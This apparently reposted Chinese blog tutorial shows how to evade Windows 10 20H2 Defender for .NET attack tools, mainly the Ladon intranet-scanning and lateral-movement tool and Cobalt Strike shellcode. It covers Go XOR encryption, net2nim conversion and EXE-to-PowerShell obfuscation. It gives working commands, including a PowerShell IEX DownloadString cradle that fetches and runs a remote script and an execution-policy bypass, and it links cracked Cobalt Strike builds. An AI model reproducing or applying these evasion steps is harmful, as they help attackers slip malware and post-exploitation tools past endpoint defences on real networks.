〖免杀〗.net程序一键免杀Win10 20H2 Defender「建议收藏」
WIN10更新至最新版20H2發(fā)現(xiàn),查殺能力比以前強了不少,特別是針對CS加載.NET程序集或NIM加載.NET的查殺,畢竟你要調(diào)用的函數(shù)微軟很了解,它想攔截想殺還是比較容易的。但是不知道大家有沒聽說過一個故事“微軟的編程工具的開發(fā)工程師,編寫程序時,也需要查閱文檔”,說明什么?微軟系統(tǒng)的API很多,是微軟寫的沒錯,但又不是一個人自己寫的,就算是一個人自己寫的,功能那么多,他也根本記不起,用到自己的東西也要查閱文檔,就像我用Ladon有時也要查閱文檔,這很正常,因為我寫過的工具或功能太多,有些久不用,甚至都會忘記我自己寫過什么。所以我想說的是,微軟就算做殺軟,它也不可能做到全面監(jiān)控,因為參與開發(fā)殺軟的人,它不可能對微軟系統(tǒng)上百萬函數(shù)了如指掌,越是大型程序,需要的開發(fā)人員越多,很多人都只是負責某一模塊對整個系統(tǒng)可能只是一只半解,所以Defender雖然查殺能力某些方面有點加強了,但是很多方面它依舊無法查殺,還沒達到自己人寫的程序就真比其它殺軟牛B的地步,那些專門做殺軟的,逆向能力很強,有BIN文件對他們來說就相當于源代碼,很多人比微軟員工還要了解win系統(tǒng)。舉個簡單的例子,你在某公司工作,有些員工可能你壓根都不認識,更別說和公司所有程序員了解他們所寫過的代碼,微軟的操作系統(tǒng)有多少人來寫,defender這部門又只有多少人,他們怎么可能把所有函數(shù)都了解,就算24小時不吃飯不做任何事,只研究代碼也做不到全面查殺或攔截,至少最近幾年還比不過很多主流殺軟。任何一個殺軟能查殺一個全球大量人使用的工具這是應(yīng)該也是必須的很常規(guī)的考驗,殺了不代表這殺軟就強了,但是不殺它一定是垃圾。如CS,因為全球大量人使用,任何一個殺軟殺它都說明不了什么。好了廢話不多說,進入正題。
GO異或加密免殺
使用GO免殺CS的shellcode,生成的dll上線成功執(zhí)行CMD命令正常,但執(zhí)行dumplsass等相關(guān)高危功能或加載Ladon時被殺,CS直接下線,甚至加載一個只輸出hello world的.net程序集也會被殺,這樣會導致我們瞬間失去很多后滲透工具插件帶來的便利,這是2021.11.19號的病毒庫查殺情況。
[外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-qbgd7UY6-1639834930031)(http://k8gege.org/k8img/posts/win10/20h2_2.PNG)]
這種情況怎么解決?CS無法加載Ladon插件,那么我們只能把Ladon傳過去了,但測試發(fā)現(xiàn)Ladon.exe也被殺,我的發(fā)克,竟然還說是木馬。
Nim免殺.net
9月份的時候該方法針對Denfender還是可以的,所以我們可以嘗試一下。使用net2nim工具將.net程序轉(zhuǎn)換成bytes,并使用nim加載編譯生成新程序,可過一些殺軟及舊版Win10 Defender,如圖所示
安裝Nim
https://nim-lang.org/
下載zip大約20M
設(shè)置環(huán)境變量 F:\nim-1.4.8\bin
安裝winim
C:\Users\k8gege\Desktop>nimble install winim
Downloading https://github.com/khchen/winim using git
Verifying dependencies for winim@3.6.1
Installing winim@3.6.1
Success: winim installed successfully.
net2nim免殺.net程序
net2nim Ladon.exe out.exe
使用Nim加載.net程序集也可以免殺不少殺軟,在此版本之前也可過Defender,但Win10更新至20H2后雖然靜態(tài)不殺,但一執(zhí)行會被攔截,提示CLR加載錯誤,程序也不殺,但無法使用其功能,相當于免殺失敗。
使用LadonGUI免殺.NET程序
怎么辦?我們需要Ladon掃描內(nèi)網(wǎng)或進行橫向移動,但是EXE被殺了,還有辦法嗎?答案是有的,記得文章開頭說過的話嗎,Defender在某些方面是殺能力還是比較差的,如powershell、VBS、java、php啊等腳本類語言,不只是它在這方面,其它專做殺軟的在這方面也不是很強。去年發(fā)布的Ladon 7.5的GUI版本開始就提供有一些PowerShell加密混淆方法,也包含了EXE轉(zhuǎn)PowerShell,PowerShell轉(zhuǎn)EXE功能,也發(fā)布過如何將EXE轉(zhuǎn)成PowerShell的教程,以免殺最新版Ladon為例,首先將ladon.exe拖放至exe/dll(.net)文本框中,然后點擊右邊的”EXE->PowerShell”按鈕,成功會生成Ladon.ps1,如果你只打算把PS1放在win10機器上使用,也可以轉(zhuǎn)Ladon40.exe,畢竟有幾個模塊只支持.net4.0,當然轉(zhuǎn)換其它.NET程序也一樣。
生成的PS1內(nèi)容如下,已做好加載,如果是你自己寫的程序,只需在第8行開始加入相關(guān)參數(shù)調(diào)用即可。若是Ladon請使用記事本打開ps1文件,復制紅線所示@和@里的字符串很長可能有2M
再打開Ladon9.0.ps1或Ladon9.1.ps1找到里面那個很長的加密字符串,將剛轉(zhuǎn)換的加密字符串粘貼替換,注意長度那里也需要替換,大小不對應(yīng)也會導致PS1加載失敗。
[外鏈圖片轉(zhuǎn)存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-pYSkigEv-1639834930085)(http://k8gege.org/k8img/posts/win10/20h2_8.PNG)]
若發(fā)現(xiàn)哪些模塊不可使用,可自行參考WIKI,將缺少的模塊名稱參數(shù)加入
轉(zhuǎn)換完成后,我們再測一下20H2的Defender,免殺成功,可以嗨起來了。無論使用遠程還是本地加載Ladon.ps1,Defender都不殺了。
遠程加載免殺
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
本地加載免殺
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon OnlinePC
還有另外一個方法,就是自行免殺LadonGo,開源支持全平臺。
小結(jié)
大家也可以按照該方法,免殺其它.net寫的工具,像Ladon這樣一百多個功能的程序都能免殺,相信大部份.net寫的程序,應(yīng)該都能免殺,除非是被Defender重點針對的工具,如mimikat。
參考
Ladon免殺/.NET免殺/Exe2Ps1/Ps12Exe
http://k8gege.org/Ladon/Exe2Powershell.html
Ladon九種PowerShell命令混淆加密免殺方法
http://k8gege.org/Ladon/PowershellEncode.html
CS下載
CS 3.12 3.13 4.3 4.4 K8激活成功教程版
000為原始試用版本(部分未找到,大家可以提供給我更新)
https://github.com/k8gege/Aggressor/releases/tag/cs
Ladon下載
LadonGo 3.8: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
歷史版本: http://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
9.1版本:K8小密圈
總結(jié)
以上是生活随笔為你收集整理的〖免杀〗.net程序一键免杀Win10 20H2 Defender「建议收藏」的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux内核驱动模块开发makefil
- 下一篇: 什么是UE4_unity3d和ue4区别